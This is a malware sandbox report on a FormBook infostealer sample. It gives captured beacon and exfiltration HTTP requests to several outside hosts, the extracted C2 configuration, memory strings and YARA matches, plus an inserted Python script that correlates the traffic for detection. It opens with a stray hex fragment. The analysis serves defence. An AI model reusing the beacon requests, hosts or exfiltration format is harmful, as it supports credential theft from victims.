5e 0c 09 6e c7 7a 76 5d c0 ac e5 94 ea bd 63 28 67 9d d9 65 4e c2 6d bd f9 6a fd 03 4b ff 88 2e 68 b7 32 60 28 e7 5f fc bf 39 76 20 e3 af 33 2e e2 b6 45 1e 4a b7 d5 ec 4b ad d9 ba dd 4a 04 73 fe aa fd d4 c1 6e a6 2c 0a a5 ad 99 6d 00 4d b1 c6 99 64 1a be f2 bb 87 db 37 ab 08 0a fb 3b 2c c4 f8 4d 57 cf fc a9 be 54 9e 00 99 da 6c aa 7f f5 ab ce
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: nginx/1.20.1
  Date: Mon, 08 Aug 2022 14:11:27 GMT
  Content-Type: text/html
  Content-Length: 3650
  Connection: close
  ETag: "616e0979-e42"
  Data Ascii (decoded from the report's hex dump, which is truncated):
  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">

  <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
      <head>
          <title>The page is not found</title>
          <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
          <style type="text/css">
              /*<![CDATA[*/
              body {
                  background-color: #fff;
                  color: #000;
                  font-size: 0.9em;
                  font-family: sans-serif,helvetica;
                  margin: 0;
                  padding: 0;
              }
              :link {
                  color: #c00;
              }
              :visited {
                  color: #c00;
              }
              a:hover {
                  color: #f50;
              }
              h1 {
                  text-align: center;
                  margin: 0;
                  padding: 0.6em 2em 0.4em;
                  background-color:
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: nginx/1.20.1
  Date: Mon, 08 Aug 2022 14:11:30 GMT
  Content-Type: text/html
  Content-Length: 3650
  Connection: close
  ETag: "616e0979-e42"
  Data Raw: identical to the previous response (same ETag and Content-Length; the report's hex dump is the same byte sequence)
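Two things in the traffic above matter more for detection than any single hostname: every request, GET and POST alike, goes to the same /etn4/ path on three different hosts, none of which is the C2 in the extracted configuration (www.reliabenefitssupport.com), and the GETs carry no User-Agent header at all while the POSTs send an IE11-style one and reuse the GET query parameter name (cRvt5xTh) as the form field name. All three hosts answered 404, as the decoys in a FormBook rotation normally do. The Python below is an added example, not part of the report, that parses request text in the shape shown above and correlates it with the extracted configuration. The five requests are reconstructed here with CRLF line endings and shortened POST bodies, the decoy list is abbreviated, and the helper and finding names are the example's own.

```python
"""Beacon-vs-configuration correlation for the FormBook traffic above (added example)."""
import json
from urllib.parse import parse_qs, urlsplit

IE11_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko"


def _get(host: str, query: str) -> str:
    # The GETs in the report carry only Host and Connection: no User-Agent at all.
    return f"GET /etn4/?{query} HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n"


def _post(host: str, body: str) -> str:
    # Content-Length is computed from the shortened body; the report's real value was 418.
    return ("POST /etn4/ HTTP/1.1\r\n"
            f"Host: {host}\r\nConnection: close\r\nContent-Length: {len(body)}\r\n"
            f"Cache-Control: no-cache\r\nOrigin: http://{host}\r\nUser-Agent: {IE11_UA}\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\n"
            f"Referer: http://{host}/etn4/\r\nAccept-Language: en-US\r\n"
            "Accept-Encoding: gzip, deflate\r\n\r\n" + body)


# Constructed from the five requests in the report; POST bodies are shortened.
REQUESTS = [
    _get("www.funwave.info", "jDK=cFN0wh5pOr2lLXB&cRvt5xTh=Cta36k8ikZqurnipoxkRmmGd40Kya2aSborXxyuf+Fe+qece1yHxQlddjwwspvxEwVKtNXVfvaYDvAKdsC9znF0tof1OuukDyDlLohNqUsvE"),
    _get("www.reprograme-se10x.com", "cRvt5xTh=molCG9tOWGG77xzFdRevdPvUiNWpIWpi7GNNNgA2ifx3ZRGhVtKNJJVLj+R0F9QcWvNkIdZbD/ktNYP0MkMUr0Msa5tKdHW+1cW/UCZDWxnM&jDK=cFN0wh5pOr2lLXB"),
    _get("www.tadeumilhosrp.com", "jDK=cFN0wh5pOr2lLXB&cRvt5xTh=/R5Ku0REc5kTBOTK4FybjCic+J3HjscPDRicZMYanJDb3VFeXunUS1CfOY6dWIQDflcWbkgY3XkW9HfCwqM4rRtZZd8ZPm0cmGZ9eLaMCkCJ"),
    _post("www.reprograme-se10x.com", "cRvt5xTh=rqNiFJkdaDeH1Hn6ZDauI8rXyO~FcngIhGhUWTs9j8tWJRmEEZWyIptysPQqY8AcSuQ3D_x_Tsx9I4WnbXgEqWwgJ5tleUn9xqu0Xg05XHajNOcInNdXYny596jAf0U3wJTsYM5OvgHjRh2HIhs0x2PVq8bP1WvfRG6AJ9D."),
    _post("www.tadeumilhosrp.com", "cRvt5xTh=yTRqtBFpX_kNDvDvwXC-wzWSkqq7hONbQQiaFKIVt7mc4mQpO_TcZHCQHoLIb-VoWglITVohzldl7l6F(6QLniUtKdI9PU4gnnp5c4nYDQzcEC2vZEnJgtopBA5IQ_(15HwzHrdGHkJ42TcZO7vglnpcBtpcrfK_Vi6HLhIx5_iDtQF4Qok3Aeu_6jIfn6TiuS9FfJMjxoBlcYveCutfzOiNsAhoGzB3IoDG0T7HkEX3N2X2fHzhMdIi7g9Tlc."),
]

# The extracted configuration from the report; the 64-entry decoy list is abbreviated.
CONFIG = {
    "C2 list": ["www.reliabenefitssupport.com/etn4/"],
    "decoy": ["rV2+KhY2v4ETgrjhsOdtLg==", "eSFnVjRiqHAIadtGwrlpa74g6QcN", "WZH5aS87DxPqd6LDQIeq4JfVOck="],
}


def parse_request(raw: str) -> dict:
    """Split one HTTP/1.1 request into method, path, query, host, headers and form body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    return {
        "method": method,
        "path": parts.path,
        "query": parse_qs(parts.query),
        "host": headers.get("host", ""),
        "headers": headers,
        "body": parse_qs(body) if method == "POST" else {},
    }


def c2_host_and_path(config: dict):
    """FormBook stores its C2 as host/path/ with no scheme."""
    host, _, path = config["C2 list"][0].partition("/")
    return host, "/" + path


def analyze(raw_requests, config: dict) -> dict:
    reqs = [parse_request(r) for r in raw_requests]
    c2_host, c2_path = c2_host_and_path(config)
    on_path = [r for r in reqs if r["path"] == c2_path]
    hosts = sorted({r["host"] for r in on_path})
    gets = [r for r in on_path if r["method"] == "GET"]
    posts = [r for r in on_path if r["method"] == "POST"]
    get_keys = set().union(*[r["query"].keys() for r in gets])
    post_keys = set().union(*[r["body"].keys() for r in posts])
    return {
        "c2_path": c2_path,
        "configured_c2_host": c2_host,
        "hosts_on_c2_path": hosts,
        "hosts_not_in_config": [h for h in hosts if h != c2_host],
        "get_without_user_agent": sum("user-agent" not in r["headers"] for r in gets),
        "shared_params": sorted(get_keys & post_keys),
        # Several hosts hit with the same path, and the POST form field reuses a GET
        # query name: the real C2 is hidden among decoys, so pivot on the path, not the host.
        "beacon_like": len(hosts) > 1 and bool(get_keys & post_keys),
    }


if __name__ == "__main__":
    print(json.dumps(analyze(REQUESTS, CONFIG), indent=2))
```

Blocking only the configured C2 host would have stopped none of the five requests shown; the stable pivots are the path, the form field name, the missing User-Agent on the GETs, and the fact that the client process is explorer.exe.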
Most of the URLs below are font-vendor copyright strings from font metadata embedded in the dropper (vbc.exe, process 0) and are not network indicators; the fedoraproject.org and nginx.net strings in control.exe memory are consistent with the default nginx 404 pages returned above, and the funwave.info and reprograme-se10x.com strings are the beacon URLs themselves.

Source: control.exe, 0000000D.00000002.645738782.000000000568E000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://fedoraproject.org/
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fontfabrik.com
Source: control.exe, 0000000D.00000002.645614968.0000000005496000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://funwave.info/etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=Cta36k8ikZqurnipoxkRmmGd40Kya2aSborXxyuf
Source: control.exe, 0000000D.00000002.645738782.000000000568E000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://nginx.net/
Source: control.exe, 0000000D.00000002.645688479.0000000005592000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://reprograme-se10x.com/etn4/?cRvt5xTh=molCG9tOWGG77xzFdRevdPvUiNWpIWpi7GNNNgA2ifx3ZRGhVtKNJJVLj
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: vbc.exe, 00000000.00000002.406494401.0000000001037000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.coma/
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: vbc.exe, 00000000.00000003.367848176.000000000103D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.comtpuKK
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
        Source: control.exe, 0000000D.00000003.605166525.00000000079F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629
        Source: control.exe, 0000000D.00000003.605166525.00000000079F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/https://www.google.com/chrome/thank-you.htmlabout:blankhttps://adservi
        Source: unknownHTTP traffic detected: POST /etn4/ HTTP/1.1Host: www.reprograme-se10x.comConnection: closeContent-Length: 418Cache-Control: no-cacheOrigin: http://www.reprograme-se10x.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.reprograme-se10x.com/etn4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 52 76 74 35 78 54 68 3d 72 71 4e 69 46 4a 6b 64 61 44 65 48 31 48 6e 36 5a 44 61 75 49 38 72 58 79 4f 7e 46 63 6e 67 49 68 47 68 55 57 54 73 39 6a 38 74 57 4a 52 6d 45 45 5a 57 79 49 70 74 79 73 50 51 71 59 38 41 63 53 75 51 33 44 5f 78 5f 54 73 78 39 49 34 57 6e 62 58 67 45 71 57 77 67 4a 35 74 6c 65 55 6e 39 78 71 75 30 58 67 30 35 58 48 61 6a 4e 4f 63 49 6e 4e 64 58 59 6e 79 35 39 36 6a 41 66 30 55 33 77 4a 54 73 59 4d 35 4f 76 67 48 6a 52 68 32 48 49 68 73 30 78 32 50 56 71 38 62 50 31 57 76 66 52 47 36 41 4a 39 44 5f 38 57 6d 75 53 75 5a 49 75 5f 7a 63 36 78 38 79 74 69 46 79 56 6b 28 5a 63 34 39 78 6d 50 54 4a 6e 6b 6d 52 70 4f 35 68 78 5f 56 64 67 77 4b 78 6c 5a 32 71 6a 70 57 76 63 4e 4c 61 37 48 50 51 4c 6b 36 30 45 30 6c 36 47 62 55 43 41 2d 59 6a 72 31 44 47 76 39 58 32 49 66 67 6f 43 66 44 70 57 51 44 45 4c 77 37 42 6a 72 59 68 30 46 6b 67 46 57 53 4c 32 38 73 73 70 34 4f 37 5a 52 48 36 31 47 39 63 71 7a 61 76 30 4f 6a 44 31 48 35 65 46 57 52 41 33 38 46 61 53 6f 73 79 6e 5f 6d 51 74 61 54 2d 64 6e 59 7a 63 65 69 53 70 7a 65 42 73 35 4b 48 57 52 59 37 49 32 6f 76 49 47 58 47 62 70 39 31 34 73 5a 43 7e 46 38 34 51 47 62 66 44 42 52 39 7e 62 68 4a 44 4c 47 59 56 49 39 59 6f 50 56 43 56 72 72 52 52 75 52 41 64 55 6f 2e 00 00 00 00 00 00 00 00 Data Ascii: 
cRvt5xTh=rqNiFJkdaDeH1Hn6ZDauI8rXyO~FcngIhGhUWTs9j8tWJRmEEZWyIptysPQqY8AcSuQ3D_x_Tsx9I4WnbXgEqWwgJ5tleUn9xqu0Xg05XHajNOcInNdXYny596jAf0U3wJTsYM5OvgHjRh2HIhs0x2PVq8bP1WvfRG6AJ9D_8WmuSuZIu_zc6x8ytiFyVk(Zc49xmPTJnkmRpO5hx_VdgwKxlZ2qjpWvcNLa7HPQLk60E0l6GbUCA-Yjr1DGv9X2IfgoCfDpWQDELw7BjrYh0FkgFWSL28ssp4O7ZRH61G9cqzav0OjD1H5eFWRA38FaSosyn_mQtaT-dnYzceiSpzeBs5KHWRY7I2ovIGXGbp914sZC~F84QGbfDBR9~bhJDLGYVI9YoPVCVrrRRuRAdUo.
        Source: unknownDNS traffic detected: queries for: www.funwave.info
        Source: global trafficHTTP traffic detected: GET /etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=Cta36k8ikZqurnipoxkRmmGd40Kya2aSborXxyuf+Fe+qece1yHxQlddjwwspvxEwVKtNXVfvaYDvAKdsC9znF0tof1OuukDyDlLohNqUsvE HTTP/1.1Host: www.funwave.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /etn4/?cRvt5xTh=molCG9tOWGG77xzFdRevdPvUiNWpIWpi7GNNNgA2ifx3ZRGhVtKNJJVLj+R0F9QcWvNkIdZbD/ktNYP0MkMUr0Msa5tKdHW+1cW/UCZDWxnM&jDK=cFN0wh5pOr2lLXB HTTP/1.1Host: www.reprograme-se10x.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=/R5Ku0REc5kTBOTK4FybjCic+J3HjscPDRicZMYanJDb3VFeXunUS1CfOY6dWIQDflcWbkgY3XkW9HfCwqM4rRtZZd8ZPm0cmGZ9eLaMCkCJ HTTP/1.1Host: www.tadeumilhosrp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

        E-Banking Fraud

        Source: Yara match File source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match File source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        System Summary

        Source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: Process Memory Space: vbc.exe PID: 6088, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: Process Memory Space: vbc.exe PID: 5776, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: Process Memory Space: control.exe PID: 1272, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: vbc.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
